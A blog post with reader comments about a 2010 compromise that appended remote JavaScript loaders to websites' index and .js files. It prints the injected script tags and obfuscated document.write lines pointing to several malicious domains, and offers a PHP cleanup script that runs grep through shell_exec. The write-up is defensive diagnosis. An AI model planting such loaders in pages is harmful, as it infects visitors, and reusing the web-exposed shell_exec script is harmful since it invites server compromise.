Saturday morning a couple of my sites were hacked by something I’ve not found a lot of info about. I’ll call it The Drunkjeans Hack. I’ve also found this being inserted from other domains (see below).
Some idiot has inserted a piece of code into the main index.php file that looks like this:
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--bc02f73b8cefc99fd497a0d96d646c0e-->
The first line calls a JavaScript file on the given domain, while the second line is a unique identifier (consider yourself an individual).
What this thing does is unclear, but depending on how far the hackers get with this, it could be anything from a wonky homepage to the entire site being down. I did some digging and here’s what I found out:
This thing attacks all browser default files as well as .js files. Literally ALL of them in your site, including sub directories. Browser default files are index.php, index.htm, index.html, start.thm, start.html et cetera.
In WordPress, there’s an index.php in your root and one in your theme’s directory.
There are also several .js files cattered all over the installation, including plugin and theme subdirectories so it can be a rather lenghty search…
The good news is that it appears that the exploit does not seem to mess with your database from what I can tell.
What does it do?
The Hack attaches a piece of code that loads a Javascript whereever it can. What it does is unclear (I tried to download one for closer inspection but it didn’t work). It does this either as a <script> tag or a JavaScript document.write statement.
A good example for this is the Next Gen Gallery Plugin, which uses the Shutter Reloaded library. Here’s what I found at the end of the shutter-reloaded.js file (in wp-content/plugins/nextgen-gallery/shutter/):
document.write('<s'+'cript type="text/javascript" src="http://oldgoal.com:8080/Database.js"></scr'+'ipt>');
Why does it do that?
I think I’ve discovered the big idea now: on a shared hosting package with Strato in Germany I found some files that redirected the site to several Viagra Shops (like Superviagraonline.com – grab a bargain while it’s hot).
How can we kill it, Cap’n?
Looks like deleting the code and saving the file is doing a good job. The code is always at the end of the aforementioned files so it’s fairly easy to find – once you know which file it’s attached itself to. Use Sophos or the free version of AVG for clues.
If you want to find EVERY file on your site that’s infected issue this server command in your home directory:
grep -r 'roundstorm.com' *
chown root index.php chmod 444 index.php
PHP Finder Script
I figured that many of us don’t have the liberty of sheel access, so I’ve devised this little php script that should do the hard work of finding infected files for you.
Copy the code below into a new text file, call it test.php and upload to the root directory of your site. Then call it in a browser (say by http://www.yoursite.com/test.php) and the script will get to work. This can take a few minutes – be patient.
<?php $input = "grep -r " . "'" . "roundstorm.com" . "'" . " *"; echo $input; $output = shell_exec($input); echo "<pre>#$output</pre>"; ?>
Replace the “roundstorm.com” domain with whatever bug you think you have. To be 100% sure, run the script several times with all the domain variations listed below.
Variations
So far I’ve found the following code fragments. Your site is only ever affected by one of these domains so that’s the one to search your files for.
A WHOIS lookup reveals that these domains were registered on the 7th of July 2010 in Rubaix, France via Bizcn.com (that’s a Chinese ISP and Hosting Provider).
- Drunkjeans.com
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--bc02f73b8cefc99fd497a0d96d646c0e-->
- Roundstorm.com
<script type="text/javascript" src="http://roundstorm.com:8080/Raster_Graphic.js"></script>
<!--8a4dc551741b1d10ebb7f9be14f2fd86-->
<script type="text/javascript" src="http://roundstorm.com:8080/Online.js"></script>
<!--aece678dacd5049fe548c4340509b03d-->
What’s funny about this vairation is that apparnetly McAfee have classed this domain as SAFE… why am I not surprised?
- Tightsales.com
<script type="text/javascript" src="http://tightsales.com:8080/Gnutella.js"></script>
<!--ff2dbb7d5af9170e22a852d7c5329dd4-->
- Oldgoal.com
<script type="text/javascript" src="http://oldgoal.com:8080/Database.js"></script>
<!--c7be90541d124051804d7e894f2ca5f8-->
- Ionicclock.com
<script type="text/javascript" src="http://ionicclock.com:8080/P2P.js"></script>
<!--4af2b43758e09b79597726bfba081cdb-->
- Hugejar.com
<script type="text/javascript" src="http://hugejar.com:8080/Bandwidth.js"></script>
<!--fa1321ff9c78ec6db9352bd10fba5ee4-->
- Pantscow.ru
<script type="text/javascript" src="http://pantscow.ru:8080/Null.js"></script> <!--4959c803f900d6a68b1b0140227118ba-->
- Malepad.ru
document.write('<s'+'cript type="text/javascript"
src="http://malepad.ru:8080/QuickTime.js"></scr'+'ipt>');
- Galslime.com
In the WP backend, I could see something being called from galslime.com – not sure which file is compromised but I’m determined to find out.
Further Reading
Some forum posts I found about this exploit:
{ 34 comments… read them below or add one }
Did you ever find out which file they used to compromise your WP installation?
So far I know the INDEX.PHP files have been compromised – both in the Wordpress directory and in the directory for the active theme.
There has to be something else though because neither of these files are called in the Wordpress Backend, and I can see them being loaded there too. I’ll keep digging and will report…
It looks like we had our main site hacked late Thu / early Fri 8-9/July/2010. Ours is hand crafted html hosted on a dedicated server with a uk-based isp, so this isn’t just a wordpress issue. Hack added after closing html tag as in post: roundstorm.com:8080/Scrolling.js
Ah, thanks for letting me know. The plot thickens. Which hosting company are you with? And what OS is your server running?
I’ve experienced this with a 1and1 dedicated host in the UK (running CentOS 5 and Plesk 9.5) and also with a Hostgator shared package (don’t know what OS they run – but they use Cpanel instead of Plesk).
ISP: tsohost.co.uk, OS: some linux flavour!, uses CPanel.
We noticed it first on Fri am with problems linking. Thought is it was a firewall issue initially. AVG (free version!) was the first to picked it up as a threat on an employees home computer.
Thanks for the tip – good old AVG, I’ll try that next. I’ll get in touch with a couple of hosting providers too and see if they know about this.
I meant to ask: what was the file called they got into? Was it index.html?
Hi Jay. Yes, it was plain old “index.html”. Other pages on the site seem ok.
Also compromised. All index.php, main.php and home.php files. Site is custom framework so no opensource CMS or anything.
CentOS 4.2
Plesk
What I also found was that it modified every single .js file and added the following at the bottom:
document.write(”);
Got into my index.htm file and as above post says, compromised my javascript files and added document.write(…roundstorm etc…) at the bottom of each of the files.
This isn’t wordpress only, my site is completely custom built.
Could you let me know if the .js files were in a subdirectory and what they were called?
I’m currently having a plough through the myriads of Wordpress .js files but haven’t found anything yet.
Do any of you advertise on facebook? I started an ad Friday(first time ever)- for a new website that has been hacked. I have never advertised with facebook before but then (Sat./Sun) started having these problems. I was just wondering if there was any tie to the sites that advertise on facebook?
I can’t get to any of my pages and even take the code off. All of my pages seem to have the hugejar.com code but I can’t access them.
Heidi, I’ve checked with some of my clients and none have advertised on Facebook.
I had the same thing on my website, it infected various different scripts and somehow even got in to replace and infect well protected files. It even got to some scripts that are not public. To me this suggests some kind of root level access.
I don’t know how this virus works or anything about its method or how to protect against it, but I have managed to check through 20,000 odd files and replace them with fresh copies from my backups. Mostly index.php’s, .js files and .html stuff.
Just had another site hacked with something probably related: I’ll call it the “Comber 38″ Hack. I wish these attacks would stop – and I’m still clueless how people can write to a directory without having access to it.
If you know anything about how this is possible, please let us know.
Ours got hacked on July 8th as well. We are being added as a spammer and all the spam filter sites are picking it up. We are getting emails returned because our site is listed as a known spammer. Don’t know if this is related but guessing it is.
Hi Pete, I’m pretty sure this is related – I’m suffering from that as well. My good old harmless personal blog is now classed “unsafe”.
I found some instructions at StopBadware.org on how to request a review – even if it’ll take a few days at least it gets your site whitelisted again. Let me know how it works, I’m applying now too.
I would love to know how it worked too because if it got in once then it can sure as heck do it again and I doubt just changing my passwords and removing it from the web server files will work.
But I have a lot of different systems so knowing which is vulnerable requires knowing how the script works. I have tried to contact various AV firms but they are all useless.
I assume it’s some kind of injection attack (like the old SQL injections of old) that has been modified to hit HTML and JS instead of database content because my databases all seem clean, at least so far as I can tell.
However this is unlikely to let hackers write to restricted DIR’s without root access. Hmmppff
Precisely my thoughts too Mark – and just when I thought this one had passed, another attack hit me (see this article). This one doesn’t amend files, it just writes them straight into my directories – how on earth is this possible? It’s happened on several sites, each with differend user name/password combinations so I bet they don’t get in via shell or FTP access.
I’ve had a look at when my files were modified (and when the new ones were placed respectively) and checked the httpd access and error logs. Nothing unusual in the access logs but shocking results in the error log: there was a grep command that was used literally on every file on one site – access was always denied though. 6 different IP addresses tried to open files and systematically “guessed” directories that lucky for me didn’t exist – among their interests is phpMyAdmin, php and the Wordpress Login screen. Scary!
Yesterday I’ve discovered OSSEC and will install that on my systems today. It’s a Open Source Intrusion Detection System. The guys at Wordpress.com use it to monitor their servers, see if that helps. It’s suppsed to cut access to IP addresses that would do what I’ve mentioned above immediately and send me an email when an attack is underway. I’ll let you know how it works.
Sadly my site is on a Managed Dedicated Server so that’s not an option but I did find some useful tools for checking website security and will give those a bash. Check this.
http://sectools.org/web-scanners.html
Great find Mike – some of those tools are also mentioned in the OSSEC book. I think a rookit check and server rebuild is in order…
I’ve just added a PHP Finder Script to the article! With it you can find infected files via the web browser – works great for shared hosting packages
We’ve got the friggin thing too – we thought it had gotten in via mybb though?
I have my mate looking at this later – he’ll sort it!
Really upsets me to see people doin stuff to hard working peoples websites.
Why dont they just get a life?
Ive just experienced the same russian filehack on 3 different webproviders i use. One of them is surftown.dk/surftown.com and an online friend of mine noticed the same code on his webpage which ALSO is surftown.dk – and we’re on two different accounts and havent exchanged any form of file exchange or anything at all.
Could this be a weakness/bug in linux or php? It must be a pretty big one if a pretty big webhost-provider has let them through.
OR…it could be that both my PC and my friends PC is infected with the same malware thing causing the code addition whenever we contact the ftp server. Its really a mystery…
I’ve fallen foul of the pantscow.ru version. Had 2 sites hacked. Both on the same physical server but via different hosting accounts (one direct, one reseller with the same hosting company). Both use cpanel.
Reported it to my webhost and they said that there was suspicious FTP activity shortly before I first noticed the site was down / hacked. They think the hackers may have gained access to my FTP passwords. Possible I suppose since I was “between” Norton 360 and ESET. ESET wasn’t working as Windows updates had casually omitted to update me to Vista SPs 1 & 2 and … I’ll spare you the saga.
Alternatively, it might be a cpanel vulnerability?
Looks like there are so many of us infected by this thing. Various hosts, various configurations. I don’t think it’s cpanel; I’m running Plesk and had the same thing happen. Those panels only control aspects the LAMP servers – but it could well be an Apache exploit.
I’ve just changed all my FTP passwords to some ridiculous code strings that nobody can remember. It’s now 48 hours later and the hack hasn’t come back – so maybe they did get in via FTP. Before it took them a couple of hours to hack in again. I’ll kepp you posted if it does though.
Thank you for all your comments – it makes a big difference to know that we’re not alone
Do any of you guys use FILEZILLA?
We think that’s what its using to get passwords (they are saved in plain text in a file on your PC)
And we do believe its all happening via FTP.
Yes I use Filezilla… and I also believe it’s happening via FTP. Since I’ve changed all the FTP passwords, the files are OK (although a certain IP address has tried to gain access into EVERY account).
Superb call Olly, that may well be how they got their hands on the passwords: FileZilla.
Hands up everybody who has their site hacked AND uses FileZilla.
http://forum.filezilla-project.org/viewtopic.php?f=1&t=11003&start=0
FYI
A search for filezilla, password, hack finds LOTS of stuff about it.
We had 3 accounts hacked on our server, however we cant work out how these three particular acocunts got owned.
I have filezilla on mine, and that could explain 2 of them, but the one other 1 is a mystery.
My mate uses filezilla, but only has HIS account saved.
The only explanation is that we both had/have a virus.
Im scanning every computer in the office with Malware Bytes.. Not found anything on mine yet tho!
Also hacked. We had the malepad.ru in all our js files. We don’t use filezilla. Since the DB’s seem unaffected and based on comments above I’m leaning towards FTP breach. Obviously we’ve changed all the FTP passwords. Off to fix all the js files now….
@ Jeremy
What a pain… Good luck
@Alex79
Sounds serious. See if you can get in touch with your hosting provider. If they can’t help you, sign up with me and get excellent hosting with Wordpress pre-installed.
MY SITE HAS BEN hacked by * Malepad.ru
document.write(”)
I CLEAN THE FILES ITS WORK SOME TIME BUT NOW I KANT LOGHIN IN MY WORDPRESS CONTROL PANEL GIVE ERROR 500 INTERNAL SERVER ERROR END MY SITE GIVE ERROR 500 INTERNAL SERVER ERROR ..I DELET EVERYTHING DATABASE EVERYTHING..BUT I KANT INSTAL A NEW FRESH WORDPRESS ..IN ME 500 INTERNAL SERVER ERROR!!
PLISS HELPPP
Same problem as above, several sites got infected and i use CentOS, Cpanel and FileZila.
I think we had a similar problem about 6/7 months a go where all our index files got infected. but since then i have move to a new saver but with the same company .
we got it pretty bad
inkrainbow.ru/quicktime.js
pocketbloke.ru/QuickTime.js
Search ".ru" (4255 hits in 1298 files)
not all of them are the address but most are
Same here. They “hacked” our website i think through ftp and installed the above code. The url of the javascript doesn’t exist and the funny thing is that google got it just before i could do something. (i found it straight away)
Now i changed ftp password and changed also the infected files. (mostly .js files) and just one php file.
{ 3 trackbacks }